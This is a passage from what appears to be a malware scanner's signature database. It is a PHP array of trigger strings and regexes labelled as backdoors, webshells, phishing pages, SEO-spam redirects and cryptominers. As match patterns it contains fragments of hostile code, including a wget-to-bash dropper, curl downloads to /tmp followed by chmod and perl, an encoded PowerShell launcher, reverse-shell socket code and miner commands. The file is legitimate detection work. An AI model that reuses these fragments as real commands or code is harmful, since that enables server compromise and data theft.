	'87465642e7068700a0a66756e6374696f6e' => array(STR_CLEARFILE, 'php.malware.pack.006', NULL),
	'202471646678616d7868766b613d2771646' => array(STR_CLEARFILE, 'php.malware.pack.008', NULL),
),

'http-equiv="refresh"' => array(STR_TRIGGER,

	'<meta http-equiv="refresh" content="' => array(STR_TRIGGER,

		'<meta http-equiv="refresh" content="0;' => array(STR_TRIGGER,
			
			'<meta http-equiv="refresh" content="0; URL=data:text/html;base64,' => array(STR_TRIGGER,
				'PGh0bWw+DQo8SEVBRD4NCjxUSVRMRT5ESEwg' => array(STR_CLEARFILE, 'html.phishing.generic.031', NULL),
				'DQoNCiZuYnNwOzxodG1sPg0KDQo8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOyB1cmw' => array(STR_CLEARFILE, 'html.phishing.generic.031.02', NULL),
				'ZXQ9dXRmLTgiIC8+DQo8dGl0bGU+U2lnbiBJbjwvdGl0bGU+DQo8L2hlY' => array(STR_CLEARFILE, 'html.phishing.generic.031.03', NULL),
			),

			'<meta http-equiv="refresh" content="0; url=<?php' => array(STR_TRIGGER,
				'echo $rand_url;?> ">' => array(STR_CLEARFILE, 'php.malware.redirect.006', NULL),
			),

			'<meta http-equiv="refresh" content="0;URL=\'.trim($urls[rand(0,count($urls)-1)]).\'" />' => array(STR_TRIGGER,
				'$ip."\r\n", FILE_APPEND);' => array(STR_CLEARFILE, 'php.spam-seo.redirect.066', NULL),
			),

			'{ echo \' <meta http-equiv="refresh" content="0;URL=http://www.google.com" />\';' => array(STR_CLEARFILE, 'php.redirect.header_location.014', NULL, 1),
			'Loading.. Please Wait.<meta http-equiv="refresh" content="0;url=http://' => array(STR_CLEARFILE, 'html.redirect.http-Refresh_gen.001.02', NULL),
			'<meta http-equiv="refresh" content="0; url=<?php print \'v1.php?personal=\' . rand' => array(STR_CLEARFILE, 'php.phishing.TDCanada.002.02', NULL),
			'echo \'<!DOCTYPE html><head><meta http-equiv="refresh" content="0;url=\'.$jumpcode.\'"></head><body></body></html>\';' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.033', NULL),
			'<title>S.G</title>' => array(STR_CLEARFILE, 'html.redirect.http-Refresh_gen.007', NULL),
			'<meta http-equiv="refresh" content="0; url=https://put-pay.ru/' => array(STR_CLEARFILE, 'html.spam-seo.redirect.011', NULL),
			'<meta http-equiv="refresh" content="0; url=http://lazyessayclub.com/' => array(STR_CLEARFILE, 'html.spam-seo.redirect.012', NULL),
			'URL=http://google-statik.pw' => array(STR_CLEAR_LINEMATCH, 'html.redirect.google_static_pw.001', '<meta http-equiv="refresh" content="0;URL=http:..google-statik[^>]+"\s*\/>'),
			'.php?e=<?php echo htmlspecialchars($_GET[' => array(STR_CLEARFILE, 'php.phishing.redirect.022', NULL),
			'<meta http-equiv="refresh" content="0;URL=\'https://bit.ly' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.redirect.015', '<meta http-equiv="refresh" content="0;URL=.https:..bit\.ly[^>]+>'),
			'setTimeout("window.location.replace(\'http' => array(STR_CLEARFILE, 'html.spam-seo.redirect.016', NULL),
			'bozur.net' => array(STR_CLEARFILE, 'html.phishing.ebay.003', NULL),
		),

		'<meta name="description" content="ok file uploaded">' => array(STR_TRIGGER,
			'<meta http-equiv="refresh" content="1;URL=http' => array(STR_CLEARFILE, 'html.spam-seo.redirect.005', NULL),
			'<meta http-equiv="refresh" content="0;URL=http' => array(STR_CLEARFILE, 'html.spam-seo.redirect.005.02', NULL),
		),

		'<meta http-equiv="refresh" content=' => array(STR_TRIGGER,
			'<!DOCTYPE HTML>' => array(STR_TRIGGER,
				'<a href=\'http' => array(STR_TRIGGER,
					'<!DOCTYPE[^>]+>[\s]*<html[^>]*>[\s]*<head>[^:]{0,300}<meta http-equiv[\s]*=[\s]*.refresh.[\s]*content[^>]+url[\s]*=[\s]*(https?:[^>]+).>[\s]*(<script[^<]+<.script>[\s]*)?[^:]+<.head>[\s]*<body>[^\$]{0,300}<a href=.\1[^\$]{0,300}<.html>' => array(REX_CLEARFILE, 'html.spam-seo.redirect.020', NULL),
				),
			),
		),

		'$xml = @simplexml_load_file("http:' => array(STR_TRIGGER,
			'?> <meta http-equiv="refresh" content="0; url=' => array(STR_TRIGGER,
				'if (!session_id()){session_start(); ob_start();}  if (!preg_match(\'/facebookexternalhit' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.046', 'if \(!session_id\(\)\)\{session_start\(\); ob_start\(\);}[^:]+google[^:]+\$_SESSION..rands[^@]+?@simplexml_load[^:]+http:[^:]+content="0; url=http:[^<]+<.php\s*}\s}\s*\}'),
			),
		),

		'die(\'>UP_OK<\');' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.023', NULL),
		'CTx0aXRsZT5TdWRkZW5saW5rIC0gTG9n' => array(STR_CLEARFILE, 'html.phishing.suddenlink.001', NULL),
		'<meta http-equiv="refresh" content="3; url=https://login.libero.it/logout.php?' => array(STR_CLEARFILE, 'php.phishing.libero.002', NULL),
		'false\)[\s]*\{[\s]*header\(.Location: index\.php.\);[\s]*exit;[\s]*\}[\s]*\?>[\s]*<head><meta http-equiv="refresh' => array(REX_CLEARFILE, 'php.spam-seo.redirect.108', NULL),
		'<meta http-equiv="refresh" content="5; url=http://trustdelivery.su' => array(STR_CLEARFILE, 'html.spam-seo.redirect.017', NULL),
		'<meta http-equiv="refresh" content="3; url=http://herbalglobalinc.eu' => array(STR_CLEARFILE, 'html.spam-seo.redirect.018', NULL),
		'<meta http-equiv="refresh" content="1; url=http://goodfirstreward.eu' => array(STR_CLEARFILE, 'html.spam-seo.redirect.019', NULL),
	),

	'$senha = geraSenha(67, true,' => array(STR_CLEARFILE, 'php.phishing.senha_redirect.001', NULL),
	'/data.us/data.verifyonline' => array(STR_CLEARFILE, 'php.phishing.usbank.001', NULL),
),

'File' => array(STR_TRIGGER,

	'$OOO000000=urldecode(\'%66%67%36%73%62%6' => array(STR_TRIGGER,
		'ukr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLT09NHeEXHr8XhtONT08XHe' => array(STR_CLEARFILE, 'php.malware.OOO000000.001', NULL),
	),

	' File Manager</center></H1>' => array(STR_TRIGGER,
		'if($_POST[\'opt\'] == \'chmod\'){' => array(STR_CLEARFILE, 'php.backdoor.hatrk_file_manager.001', NULL),
	),

	'AddType text/plain .php' => array(STR_TRIGGER,
		'<Files ^(*.txt)>' => array(STR_CLEAR_MULTIMATCH, 'htaccess.backdoor.cgi-enabler.004', '<Files\s*\^\(\*\.txt\)\>\s*order\s*deny\s*,\s*allow\s*deny\s*from\s*all\s*<\/Files>\s*<\s*Files\s*["\']\w+\.(?:php|cgi|pl)[\'"]\s*>\s*Allow\s*from\s*[Aa]ll\s*<\s*\/Files\s*>\s*AddType\s*text\/plain\s*\.(?:php|cgi|pl)\s*AddType\s*text\/plain\s*\.(?:php|cgi|pl)\s*AddType\s*text\/plain\s*\.(?:php|cgi|pl)'),
	), 

	'@touch($filePath, $needFileTime, $needFileTime);' => array(STR_TRIGGER,
		'$remoteZip=@$_POST[\'remotezip\'];' => array(STR_CLEARFILE, 'php.hacktool.packer.006', NULL),
	),

	'echo "<!-- \'filename.php\',\'chmod\')\"><font color=green' => array(STR_CLEARFILE,'php.backdoor.uploader.110' ,NULL),
	'File\'.\'sMan\'; ## def function' => array(STR_CLEARFILE, 'php.backdoor.filesman.037', NULL),
	'$en[\'FileMan\'] = \'PHP File Manager\';' => array(STR_CLEARFILE, 'php.backdoor.phpfm.001', NULL),
	'$et[\'en\'][\'FileMan\'] = \'PHP File Manager\';' => array(STR_CLEARFILE, 'php.backdoor.phpfm.002', NULL),
	'"<!-- g(\'FilesMan\',\'c:/\') --!>";' => array(STR_CLEARFILE, 'php.backdoor.filesman.003', NULL),
	'>ZaraByte File Uploader' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.027', NULL),
	'$default_action="FilesMan";' => array(STR_CLEARFILE, 'php.backdoor.filesman.002.005', NULL),
	'function GetListFiles($folder,&$all_files){' => array(STR_CLEARFILE, 'php.hacktool.checkandall.001', NULL),
	'>FileDownloader' => array(STR_CLEARFILE,'php.backdoor.uploader.045.01', NULL),
	'Exploit By Anonymous Ghost Gaza' => array(STR_CLEARFILE, 'js.exploit.wordpress.001', NULL),
	'=[File Finder Coy' => array(STR_CLEARFILE,'php.hacktool.configuration_stealer.006', NULL),
	'= \'FilesMan\'' => array(STR_CLEARFILE, 'php.backdoor.filesman.098', NULL),
	'$imgData = @$' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.filesman.029.04', 'if[\s]*.!empty.\$imgData..[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*strrev.\$[\w]+.;[\s]*\$[\w]+[\s]*=[\s]*strrev[^}]+@\$[\w]+\(@\$[\w]+\(\$imgData[^}]+}[\s]*}'),
),

'>' => array(STR_TRIGGER,

	'[Hh][Aa4][Cc][Kk]' => array(REX_TRIGGER,
		'[Hh]acking [Aa]ttempt' => array(REX_WHITE,
			'[Pp]ro[Pp]hoto' => array(REX_WHITE,
				'>Hacker(s)?' => array(STR_WHITE,
					'ackenbe' => array(STR_WHITE,
						'ackett' => array(STR_WHITE,
							'ackney' => array(STR_WHITE,
								'>Stop Hackers?' => array(STR_WHITE,
									'/webalizer/' => array(STR_WHITE,
										'acksaw' => array(STR_WHITE,
											'ccutron' => array(STR_WHITE,
												'ackworth' => array(STR_WHITE,
													'Thacker' => array(STR_WHITE,
														'hackerscreek' => array(STR_WHITE,
															'<!--mstheme-->' => array(STR_WHITE,
																'hack saw' => array(STR_WHITE,
																	'ackberry' => array(STR_WHITE,
																		'(<title|<center|<h[\d]|<strong|<b|<TITLE|<CENTER|<H[\d]|<STRONG|<B)>[^\';<]{0,30}[Hh][Aa4][Cc][Kk][Ee3Ii1][AaDdNnRr\s]([DdGg\s])?([Oo\s])?' => array(REX_CLEARFILE, 'rex.defaced.generic.007', NULL),
																		'<(font|FONT)[^>]+[^\n<]{0,50}[^\w][Hh][Aa4][Cc][Kk][Ee3Ii1\s]' => array(REX_CLEARFILE, 'rex.defaced.generic.009', NULL),
																		'<meta [^>]{0,50}(?<![a-zA-z])[Hh][Aa4][Cc][Kk][\w]{0,4}[\s>]' => array(REX_CLEARFILE, 'rex.defaced.generic.008', NULL),
																	),
																),
															),
														),
													),
												),
											),
										),
									),
								),
							),
						),
					),
				),
			),
		),
	),

	'aWYoaXNzZXQoJF9HRVRb' => array(STR_TRIGGER,
		'Il09PXVwKXtpZihAY29weSgkX0ZJTEVTWyJmIl1bInRtcF9uYW1lIl0sJF9GSUxFU1siZiJdWyJuYW1lIl0pKXtlY2hvIjxiPn' => array(STR_CLEARFILE, 'php.backdoor.uploader.225', NULL),
		'UGVybWlzc2lvbiA6IDxpbnB1dCBuYW1lPSJwZXJtIiB0eXBlPSJ0ZXh0IiBzaXplPSI0IiB2YWx1ZT0iJy5zdWJzdHIoc3ByaW' => array(STR_CLEARFILE, 'php.backdoor.webshell.169', NULL),
	),

	'/TDS.post.php' => array(STR_TRIGGER,
		'/TDS.post.php?st=' => array(STR_CLEARFILE, 'php.malware.tds-url.001', NULL),
		'$esdid=' => array(STR_CLEARFILE, 'php.malware.tds-url.001.03', NULL),
	),

	'MCurl' => array(STR_TRIGGER,
		'if(!$this->_result) $this->scan();' => array(STR_CLEARFILE, 'php.hacktool.phish_scanner.002', NULL),
		'$url = "http://$domen/"."$path"."/$i.php";' => array(STR_CLEARFILE, 'php.hacktool.phish_scanner.002.02', NULL),
	),

	'\x10JFIF' => array(REX_TRIGGER,
		'<?php die(\'Execution denied!\');' => array(STR_WHITE,
			'<\?[pP][hH][pP]' => array(REX_CLEARFILE, 'php.backdoor.fakeJPG.001', NULL),
		),
	),

	'popen("wget -q -O - http' => array(STR_TRIGGER,
		'| bash -sh","r");' => array(STR_CLEARFILE, 'php.malware.dropper.029', NULL),
	),

	'function hide_user_count(){' => array(STR_TRIGGER,
		'.wp-admin.users-php span.count {display: none;}' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.wp_admin_hider.004', 'function hide_user_count\(\)[\s]*\{[\s]*\?>[\s]*<style>[\s]*\.wp-admin[^}]+none;\}[^\)]+add_action\(.[\w]+.,[\s]*.hide_user_count.\);'),
	),

	'   +   ' => array(STR_TRIGGER,
		'<\?php[\s]*\$[\w]+[\s]*=[\s]*"[^"]+";[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\[.[\s]*[\w]+[\s]{3,}.[\s]{3,}\+[\s]{3,}[\d]+[\s]{3,}\+[^\}]+\$[\w]+[\s]*=[\s]*[\d]+;[\s]*\?>' => array(REX_CLEARFILE, 'php.backdoor.eval_POST.145', NULL),
	),

	'ssap_htua' => array(STR_TRIGGER,
		'naMseliF\' = noitca_tluafed' => array(STR_CLEARFILE, 'php.backdoor.reverseshell.001', NULL),
	),

	'--><a title' => array(STR_TRIGGER,
		'--><a title=\"Site' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.spam-links.002', '<!-- [\\w]+ --><a title=.[\'"][\\w]+.[\'"] href=.[\'"]http:[^\'"]+[\'"]>[\\w.]+<.a><!-- [\\w]+ -->'),
	),

	'="hxxp://' => array(STR_TRIGGER,
		'co.be/forum.php?tp' => array(STR_CLEAR_LINEMATCH, 'php.malware.hidden-iframe.003', '(?:require_once\s*?\(\s*?)?(\'){0,1}<if\s?rame\s*src=.h..p:..vnbuyta.co.be.forum.php.tp[^>]+><.if\s?rame>\'(\.){0,1}(?:\s*?\)\s*?;)?'),
	),

	'&nbsp; Evil Upload !!! </div>' => array(STR_CLEARFILE, 'html.hacktool.uploader.001', NULL),
	'dNe7tqY5J/DyTOM+sxyf9+RDmal58' => array(STR_CLEAR_LINEMATCH, 'php.malware.cryptominer.001', '\$\w+\s*=\s*[(\'\.\s*"create_function)]+;\s*\$\w+\s*=\s*\@\$\w+\([\'"]\$\w+[\'"],[(\'\."eval)]+\?>[\'"][(\.\'\s*"gzinflate base64_decode)]+\$\w+\)\)\);[\'"]\)\s*;\s*\@\$\w+\([\'"][^\)]+dNe7tqY5J\/DyTOM\+sxyf9\+RDmal58.[\'"]\);'),
	'1IGp1c3QgZ290IGhhY2t' => array(STR_CLEARFILE, 'php.defaced.generic.012', NULL),
	'y Zetas Oujdi' => array(STR_CLEARFILE, 'php.defaced.zetas_oujdi.001', NULL),
	'WhatsApp Phisher' => array(STR_CLEARFILE, 'php.phishing.whatsapp.003', NULL),
	'AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph' => array(STR_CLEARFILE, 'vb.hacktool.reverse_tcp.001', 'var[\s]*_0x[\w]+=\[(\'[^\']+\',){1000}[^;]+\];[\s]*\(function\(_0x[\w]+,[\s]*_0x[^\n]+\{\},\[0x[\d]+\]\);'),
	'new ActiveXObject("WScript.Shell").Run("powershell -noP -sta -w 1 -enc  SQBmACgAJ' => array(STR_CLEARFILE, 'vb.backdoor.uploader.001', 'var[\s]*_0x[\w]+=\[(\'[^\']+\',){1000}[^;]+\];[\s]*\(function\(_0x[\w]+,[\s]*_0x[^\n]+\{\},\[0x[\d]+\]\);'),
	'chmod 0777 links.sh;' => array(STR_CLEARFILE, 'sh.malware.component.001.03', NULL),
	'$tanitatikaram = parse_ini_file("proxy.ini", true);' => array(STR_CLEARFILE, 'php.phishing.script.024', NULL),
	'>Payloud by' => array(STR_CLEARFILE, 'html.defaced.generic.163', NULL),
	'"(edoced_46esab(lave\'));?><?php' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.002', '<\\?php\\s*\\$\\w+[^;]+\\\\x\\w+[^;]+chr.\\w+[^;]+[^>]+strrev[^>]+edoced_46esab.lave[^;]+;\\?>'),
	'<!-- Sh4hien - Egyptian Shell Team' => array(STR_CLEARFILE, 'php.hacktool.Sh4hien.001', NULL), //generic one, not intended for type10
	'[Arhack-team]' => array(STR_CLEARFILE, 'php.hacktool.Arhack_generic.001', NULL),
	'index><img src=\'0\' onerror= top.location.href=' => array(STR_CLEARFILE, 'html.spam-seo.redirect.021', NULL),
	'Sh4d0w Pr0x' => array(STR_CLEARFILE, 'js.defaced.generic.095', NULL),
),

'rray' => array(STR_TRIGGER,

	'if(filter_input(INPUT_GET,' => array(STR_TRIGGER,

		'add_action' => array(STR_TRIGGER,
			
			'enqueue_locals' => array(STR_CHAIN_TRIGGER,
				'function enqueue_locals' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.033.03', 'function enqueue_locals[^\{]+\{[\s]*if\(filter_input\(INPUT_GET[^>]+ID.=>[^\}]+\}[\s]*else[^>]+=>get_current[^\}]+\}[\s]*return \$data;[\s]*\}[\s]*\}[\s]*'),
				'add_action\([^\)]+enqueue_locals[^\)]+\);' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.wp_adminadd.033.04', 'add_action\([^\)]+enqueue_locals[^\)]+\);'),
			),

			'function ([\w]+)\([^\)]*\)[\s]*\{[\s]*if[\s]*\([\s]*filter_input[\s]*\([\s]*INPUT_GET,[^\x02]+?add_action[\s]*\([\s]*[^,]+,[\s]*(strrev[\s]*\([^;]+|.\1.)[\s]*\);' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.033.02', 'function ([\w]+)\([^\)]*\)[\s]*\{[\s]*if[\s]*\([\s]*filter_input[\s]*\([\s]*INPUT_GET,[^\x02]+?add_action[\s]*\([\s]*[^,]+,[\s]*(strrev[\s]*\([^;]+|.\1.)[\s]*\);'),
		),
		
		'require($_SERVER' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.033', 'if[\s]*\([\s]*filter_input[\s]*\([\s]*INPUT_GET,[^,]+,[\s]*FILTER_[^\)]+\)[\s]*!=[\s]*false[\s]*\)[\s]*\{[\s]*require\([^\}]+[\s\}]+'),
		'echo "Success";' => array(STR_CLEARFILE, 'php.backdoor.wp_adminadd.033.05', NULL),
	),

	'array_filter' => array(STR_TRIGGER,
	
		'; echo \'OK\'; Exit;}' => array(STR_TRIGGER,
			'array($_REQUEST[\'param2\']);' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.array_filter.001.001', 'if\s+\(\$_REQUEST..param1[^;]+_REQUEST..param2[^;]+;\s*\$p\s*=\s*array.\$_REQUEST..param2[^\}]+OK.;\s*Exit.\}'),
		),
	
		'interconnectit' => array(STR_TRIGGER,
			'<p style="color:red">Delete this utility from your' => array(STR_CLEARFILE, 'php.backdoor.interconnectit_wp_s_and_r.001', NULL),
		),
	
		'array_filter($p, $f)' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.array_callback.001', '(if[^;]+\$_REQUEST[^;]+;[\s]*)?\$\w[\s]*=[\s]*(array\()?\$_REQUEST[^>]+\$pf[\s]*=[\s]*array_filter\(\$p,[\s]*\$f\);[\s]*(echo[^;]+;[\s]*)?([Ee]xi[^;]+;)?}?'),
		'"{$__[\'target\']}/wp-admin/admin-ajax.php?action=revslider_ajax_action' => array(STR_CLEARFILE, 'php.hacktool.revsliderexpoit.001', NULL),
	),

	'strrev("noi"."tcnuf' => array(STR_TRIGGER,

		'$_REQUEST[\'sort' => array(STR_CHAIN_TRIGGER,
			'$_REQUEST[\'sort\']' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.025', '\$[\w]+[\s]*=[\s]*\$_REQUEST\[.sort.\];[\s]*\$[\w]+[\s]*=[\s]*..;[^>]+strrev\([^;]+\);[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\(..,[\s]*\$[\w]+\(\$[\w]+\)\);[\s]*(.. MALWARE[\s]*){0,6}\$[\w]+\(\);[\s]*((exit\(\)|return);[\s]*)?\}?'),
			'if(isset($_REQUEST[\'sort\']))' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.025.03', 'if\(isset\(\$_REQUEST\[.sort.\]\)\)[\s]*\{[\s]*'),
		),

		'$string =' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.025.02', '\$alphabet[\s]*=[\s]*[^\n]+;[\s]*\$string[\s]*=[\s]*.[\w\+\=]{300}[^;]+;[\s]*\$array_name[^}]+\}[\s]*\$[\w]+[\s]*=[\s]*strrev[^;]+;[\s]*\$[\w]+[^;]+;[\s]*(\/\/[\w\s]*)?\$[\w]+\(\);'),
	),

	'array(97,115,115,101,114,116)' => array(STR_TRIGGER,
		'canonical_parse($enc' => array(STR_CLEARFILE, 'php.backdoor.filesman.035', NULL),
		'(97,115,115,101,114,116)' => array(STR_CLEARFILE, 'php.backdoor.assert.010', NULL, 1),
	),

	'( array($' => array(STR_TRIGGER,
		'} . $' => array(STR_TRIGGER,
			'};' => array(STR_TRIGGER,
				'( "", $' => array(STR_TRIGGER,
					') );' => array(STR_TRIGGER,
						'();' => array(STR_TRIGGER,
							'?>' => array(STR_TRIGGER,
								'}, "\n"), "", "' => array(STR_CLEARFILE, 'php.malware.obfuscated.012', NULL),
							),
						),
					),
				),
			),
		),
	),

	'$arrIdUrl = array("0"=>' => array(STR_TRIGGER,
		'-adidas-' => array(STR_CLEARFILE, 'php.spam-seo.replicas.002', NULL),
	),

	'function xTextEncode($' => array(STR_TRIGGER,
		'return $crypted_css;' => array(STR_CLEARFILE, 'php.malware.encoded_css.001', NULL),
	),

	'(\'\',\'\',$' => array(STR_TRIGGER,
		'ZXN1bHQgPSBjdXJsX2V4ZWMoJG' => array(STR_CLEARFILE, 'php.backdoor.uploader.359', NULL),
	),

	'O0_' => array(STR_TRIGGER,
		'(\$[0O_]+[\s]*=[\s]*(\'[^\']+\'|[\d]+);[\s]*){3,}\$[0O_]+[\s]*=[\s]*array\([^\)]+\);+[\s]*(\$[0O_]+[\s]*=[^;]+;[\s]*)+\?>' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.046.16', '(\$[0O_]+[\s]*=[\s]*(\'[^\']+\'|[\d]+);[\s]*){3,}\$[0O_]+[\s]*=[\s]*array\([^\)]+\);+[\s]*(\$[0O_]+[\s]*=[^;]+;[\s]*)+'),
	),

	'Z2xvYmFsICRhdXRoX3Bhc3MsJGNvbG9yLCRkZWZhdWx0X2FjdGlvbiwkZGVmYXVs' => array(STR_CLEARFILE, 'php.malware.generic.071', NULL),
	'$Scripture = array();foreach(scandir($Christ) as $AMEN){' => array(STR_CLEARFILE, 'php.spam-seo.injector.095', NULL),
	'array_unshift($data,119,105,110,100,111,119,46,116,111,112,46' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.002', NULL),
	';$arr=array($_POST[\'w0w\']' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.array_callback.004', '\$\w+?\s*?=\s*?\$_[^;]+?;\$arr=array\(\$_POST\[\'w0w\'],?\);(?:\$[^;]+?;)?array_[^;]+?;'),
	'unset($_GET[$puids_array[$puid_name]]);' => array(STR_CLEARFILE, 'php.spam-seo.stylesshets_com.004', NULL),
	'function t(e,r){this.Z="";var JR=z;var cB=new Date();var NV;if(NV!=\'inX\'){NV=\'inX\'};' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.024', 'var Gw=new Array..;try .var[^>]+;a.appendChild.L.;.;. catch.E...;'),
	'= array\(\'\d\d\d+\',\'\d\d\d+\',\'\d\d\d+\',\'\d\d\d+\'\);\$' => array(REX_CLEAR_MULTIMATCH, 'rex.array_join.008', '\$\w\w\w\w\w+= array\(\'\d\d\d+\',\'\d\d\d+\',\'\d\d\d+\',\'\d\d\d+\'\);\$[^><\?]*'),
	'\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22' => array(STR_CLEARFILE, 'php.backdoor.eval_preg_replace.005', NULL),
	'\x24\x70\x61\x79\x6c\x6f\x61\x64\x29\x2c\x30\x29\x29\x29' => array(STR_CLEARFILE, 'php.backdoor.filesman.111', NULL),
	'array_push($links[count($links)' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.hidden-div.011', '\$[\w]+[\s]*=[\s]*\[\];[\s]*if[\s]*\(\$[\w]*[\s]*=[\s]*fopen\(.http(s)*:\/\/[\w]+[^\}]+array_push\(\$[\w]*,[\s]*\[\]\);[^<]+echo[\s]*.<div[^\]]+explode\(.\/\/[^\}]+break;[\s]*\}[\s]*\}'),
	'array\([\s]*[\'deco_sba,\s]+\);[\s]*array_splice\([\s]*\$[\w]+,[\s\d,\*]+\);[\s]*\$[\w]+[\s]*=[\s]*implode\([\s]*\'\'[\s]*,[\s]*array_reverse\([\s]*\$[\w]+[\s]*\)[\s]*\);' => array(REX_CLEARFILE, 'php.hacktool.spamtool.010', NULL),
	'||~ http://www.se3curity.com ~||' => array(STR_CLEARFILE, 'php.hacktool.se3curity.001', NULL), // generic one, not intended for type10
),

'/bin/' => array(STR_TRIGGER,

	'/bin/bash' => array(STR_TRIGGER,

		'wget http' => array(STR_TRIGGER,
			'curl -O http' => array(STR_TRIGGER,
				'chmod +x' => array(STR_TRIGGER,
					'perl' => array(STR_TRIGGER,
						'rm -rf' => array(STR_CLEARFILE, 'sh.backdoor.uploader.004', NULL),
					),
				),
			),

			'ssh root' => array(STR_CLEARFILE, 'sh.backdoor.linux-rootkit.004', NULL),
		),

		'nohup php -r \'ini_set("display_errors' => array(STR_TRIGGER,
			'killstr "miner"' => array(STR_CLEARFILE, 'sh.malware.cryptominer.003', NULL),
		),

		'eval "ln -s /home/$i/public_html/configuration.php ../sym/$i' => array(STR_CLEARFILE, 'sh.hacktool.symlink.001', NULL),
		'AddType text/plain .php' => array(STR_CLEARFILE, 'sh.hacktool.htaccess-hack.001', NULL),
		'#define RUN_ROOTSHELL 0x5150' => array(STR_CLEARFILE, 'sh.hacktool.abacus-exploit.001', NULL),
		'perl nd.pl $1 $mad' => array(STR_CLEARFILE, 'sh.backdoor.linux-rootkit.002', NULL),
		'./esc ft* $rand' => array(STR_CLEARFILE, 'sh.backdoor.linux-rootkit.003', NULL),
		'/doc;chmod +x /tmp/doc;perl /tmp/doc;' => array(STR_CLEARFILE, 'sh.backdoor.uploader.001', NULL),
		'chmod \+x doc(\w+)\s+perl doc\1\s+' => array(REX_CLEARFILE, 'sh.backdoor.uploader.002', NULL),
		'shell;curl -o /tmp/shell http' => array(STR_CLEARFILE, 'sh.backdoor.dropper.001' ,NULL),
		'cat eml.txt | mail -s' => array(STR_CLEARFILE, 'sh.hacktool.mailer.001', NULL),
		'for i in `pidof xmrigMiner`; do' => array(STR_CLEARFILE, 'sh.hacktool.cryptominer_tool.001', NULL),
		'sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)' => array(STR_CLEARFILE, 'py.backdoor.connect_back.002', NULL),
	),

	'/bin/sh' => array(STR_TRIGGER,

		'cryptonight' => array(STR_TRIGGER,
			'crontab -l 2>/dev/null; echo "* * * * *' => array(STR_CLEARFILE, 'sh.malware.cryptominer.004', NULL),
		),

		'NAMED_CONF="/etc/named.conf"' => array(STR_TRIGGER,
			'echo -e \'"uname":["\'$(uname -a' => array(STR_CLEARFILE, 'pl.hacktool.configuration_stealer.004', NULL),
		),

		'cgiprint("Sent reverse shell to $ip:$port");' => array(STR_CLEARFILE, 'pe.backdoor.shell.001', NULL),
		'mv -f exploit2.c exploit.c' => array(STR_CLEARFILE, 'sh.hacktool.exploit.001', NULL),
	),

	'--auto --any --forever --nicehash --variation ${FORK} --low -o ${POOL}:${PORT} -u ${WALLET}' => array(STR_CLEARFILE, 'sh.malware.cryptominer.005', NULL),
	'= \'fpm-worker-main\'' => array(STR_CLEARFILE, 'py.malware.cryptominer.001', NULL),
	'child_stdin, child_stdout = os.popen2(base64.b64decode(cmd))' => array(STR_CLEARFILE, 'py.hacktool.webshell.003', NULL),
	'query=$(echo $cmd | base64 --decode)' => array(STR_CLEARFILE, 'py.hacktool.webshell.004', NULL),
	'if html == "XML-RPC server accepts POST requests only.":' => array(STR_CLEARFILE, 'py.hacktool.WP.xmlrpc.001', NULL),
	'{hashlib.md5(u.netloc).hexdigest():hashlib.md5(shell_pass).hexdigest()}' => array(STR_CLEARFILE, 'py.hacktool.WSO.001', NULL),
	'print "Scanning: ".$a.".0.0.0/8";' => array(STR_CLEARFILE, 'pl.hacktool.bruteforce.003', NULL),
),

'GLOBALS' => array(STR_TRIGGER,

	'$GLOBALS[' => array(STR_TRIGGER,

		'substr' => array(STR_TRIGGER,

			'},$GLOBALS{' => array(STR_TRIGGER,
				'],$GLOBALS{' => array(STR_TRIGGER,
					'error_reporting(E_ALL^E_NOTICE);define(' => array(STR_TRIGGER,
						'gzinflate(substr(' => array(STR_CLEARFILE, 'php.malware.obfuscated.035', NULL),
					),
				),
			),

			'@$GLOBALS{$GLOBALS{' => array(STR_TRIGGER,
				'explode(\'|;|?|,\', \'error_reporting' => array(STR_CLEARFILE, 'php.backdoor.generic-webshell.012', NULL),
			),
			
			'\$GLOBALS\[[\'"]\w+[\'"]\]\(\$GLOBALS\[[\'"]\w+[\'"]\]\(\$\w+\)\)' => array(REX_CLEAR_MULTIMATCH, 'rex.function_GLOBAL.001', '(\$\w+="\w{200}[^;]+;)?\s*(\$\w\d+)=".{100,120}";\s*\$GLOBALS..\w+..\s*=\s*\2\[\d+\]\.\2\[\d+\][^\?]+ ?\}'),
		),

